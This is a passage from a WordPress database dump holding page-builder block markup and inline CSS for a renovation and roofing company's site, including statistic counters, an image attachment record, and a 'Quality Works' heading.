width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-719d3f20-fd00-4b93-8eb7-4c264d4c712b skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"fd8fadce-8cee-456b-9c07-93381eebd5b2\"} -->\n<style type=\"text/css\"> .block-fd8fadce-8cee-456b-9c07-93381eebd5b2 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-fd8fadce-8cee-456b-9c07-93381eebd5b2 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-fd8fadce-8cee-456b-9c07-93381eebd5b2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-fd8fadce-8cee-456b-9c07-93381eebd5b2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-fd8fadce-8cee-456b-9c07-93381eebd5b2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-fd8fadce-8cee-456b-9c07-93381eebd5b2\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"92918f7a-2108-4235-a165-692ee41bca12\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-92918f7a-2108-4235-a165-692ee41bca12 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">120</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Roofing &amp; Siding</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Recent Work','','inherit','closed','closed','','166-revision-v1','','','2022-08-24 17:39:02','2022-08-24 17:39:02','',166,'https://cteisys.com/?p=478',0,'revision','',0),(484,1,'2022-08-24 23:19:39','2022-08-24 23:19:39','','atlas roof shingles','','inherit','','closed','','atlas-roof-shingles','','','2022-08-24 23:19:39','2022-08-24 23:19:39','',263,'https://cteisys.com/wp-content/uploads/2022/08/atlas-roof-shingles.jpg',0,'attachment','image/jpeg',0),(494,1,'2022-08-24 23:38:22','2022-08-24 23:38:22','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"0f74ad8f-2071-4290-ba8a-a6f5b75d743b\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-1\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-1 skt-blocks-block-section-outer-wrap block-0f74ad8f-2071-4290-ba8a-a6f5b75d743b background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-0f74ad8f-2071-4290-ba8a-a6f5b75d743b .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-0f74ad8f-2071-4290-ba8a-a6f5b75d743b .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-0f74ad8f-2071-4290-ba8a-a6f5b75d743b .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-0f74ad8f-2071-4290-ba8a-a6f5b75d743b.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-0f74ad8f-2071-4290-ba8a-a6f5b75d743b.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-0f74ad8f-2071-4290-ba8a-a6f5b75d743b.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-0f74ad8f-2071-4290-ba8a-a6f5b75d743b.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-0f74ad8f-2071-4290-ba8a-a6f5b75d743b.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-0f74ad8f-2071-4290-ba8a-a6f5b75d743b .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-0f74ad8f-2071-4290-ba8a-a6f5b75d743b .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-0f74ad8f-2071-4290-ba8a-a6f5b75d743b.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-0f74ad8f-2071-4290-ba8a-a6f5b75d743b .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-0f74ad8f-2071-4290-ba8a-a6f5b75d743b.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-0f74ad8f-2071-4290-ba8a-a6f5b75d743b .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-0f74ad8f-2071-4290-ba8a-a6f5b75d743b.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"017ca76a-2d72-4043-8069-e0a87b362a68\"} -->\n<style type=\"text/css\"> .block-017ca76a-2d72-4043-8069-e0a87b362a68 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-017ca76a-2d72-4043-8069-e0a87b362a68 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-017ca76a-2d72-4043-8069-e0a87b362a68 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-017ca76a-2d72-4043-8069-e0a87b362a68 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-017ca76a-2d72-4043-8069-e0a87b362a68 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-017ca76a-2d72-4043-8069-e0a87b362a68 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-017ca76a-2d72-4043-8069-e0a87b362a68 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-017ca76a-2d72-4043-8069-e0a87b362a68 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"1e4073a7-9d6b-4ab9-a4d5-00c201cbbf90\"} -->\n<style type=\"text/css\"> .block-1e4073a7-9d6b-4ab9-a4d5-00c201cbbf90 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-1e4073a7-9d6b-4ab9-a4d5-00c201cbbf90 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-1e4073a7-9d6b-4ab9-a4d5-00c201cbbf90 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-1e4073a7-9d6b-4ab9-a4d5-00c201cbbf90 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-1e4073a7-9d6b-4ab9-a4d5-00c201cbbf90 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-1e4073a7-9d6b-4ab9-a4d5-00c201cbbf90\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":386,\"width\":257,\"height\":530,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image size-full is-resized is-style-default\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/32926267_2062360403778390_9097229843803668480_n.jpg\" alt=\"\" class=\"wp-image-386\" width=\"257\" height=\"530\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"c88f6433-21d0-4925-aa46-f43024e89efd\",\"opacity\":100,\"backgroundColor\":\"#fe8333\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-quality-box\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-quality-box skt-blocks-block-section-outer-wrap block-c88f6433-21d0-4925-aa46-f43024e89efd background-type-color alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-c88f6433-21d0-4925-aa46-f43024e89efd .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-c88f6433-21d0-4925-aa46-f43024e89efd .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-c88f6433-21d0-4925-aa46-f43024e89efd .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n .block-c88f6433-21d0-4925-aa46-f43024e89efd.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-c88f6433-21d0-4925-aa46-f43024e89efd.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-c88f6433-21d0-4925-aa46-f43024e89efd.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-c88f6433-21d0-4925-aa46-f43024e89efd.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-c88f6433-21d0-4925-aa46-f43024e89efd.background-type-video .skt-blocks-block-section {\n background-color: rgba(254, 131, 51, 1); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(254, 131, 51, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"8591fc23-31c8-4760-9321-b15252d31107\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":32,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.3,\"headingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8591fc23-31c8-4760-9321-b15252d31107 .responsive-heading-title-text {\n font-size: 32px !important; margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-8591fc23-31c8-4760-9321-b15252d31107 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8591fc23-31c8-4760-9321-b15252d31107 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8591fc23-31c8-4760-9321-b15252d31107 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8591fc23-31c8-4760-9321-b15252d31107 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8591fc23-31c8-4760-9321-b15252d31107 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8591fc23-31c8-4760-9321-b15252d31107 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-8591fc23-31c8-4760-9321-b15252d31107 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-8591fc23-31c8-4760-9321-b15252d31107 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8591fc23-31c8-4760-9321-b15252d31107 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8591fc23-31c8-4760-9321-b15252d31107 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8591fc23-31c8-4760-9321-b15252d31107 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-8591fc23-31c8-4760-9321-b15252d31107 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-8591fc23-31c8-4760-9321-b15252d31107 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8591fc23-31c8-4760-9321-b15252d31107 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-8591fc23-31c8-4760-9321-b15252d31107\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.3;letter-spacing:0;color:#ffffff\">Quality<br>Works</h2></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":15,\"leftPadding\":50,\"topPaddingTablet\":15,\"leftPaddingTablet\":35,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"e52fc120-f8c4-42fc-be25-cb234dd0859c\"} -->\n<style type=\"text/css\"> .block-e52fc120-f8c4-42fc-be25-cb234dd0859c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-e52fc120-f8c4-42fc-be25-cb234dd0859c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-e52fc120-f8c4-42fc-be25-cb234dd0859c .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-e52fc120-f8c4-42fc-be25-cb234dd0859c .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 35px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e52fc120-f8c4-42fc-be25-cb234dd0859c .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-e52fc120-f8c4-42fc-be25-cb234dd0859c\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"842dd40e-fa77-4ec4-ad2a-03f89d294ee2\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-842dd40e-fa77-4ec4-ad2a-03f89d294ee2 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-842dd40e-fa77-4ec4-ad2a-03f89d294ee2 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-842dd40e-fa77-4ec4-ad2a-03f89d294ee2 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-842dd40e-fa77-4ec4-ad2a-03f89d294ee2 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-842dd40e-fa77-4ec4-ad2a-03f89d294ee2 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-842dd40e-fa77-4ec4-ad2a-03f89d294ee2 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-842dd40e-fa77-4ec4-ad2a-03f89d294ee2 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n 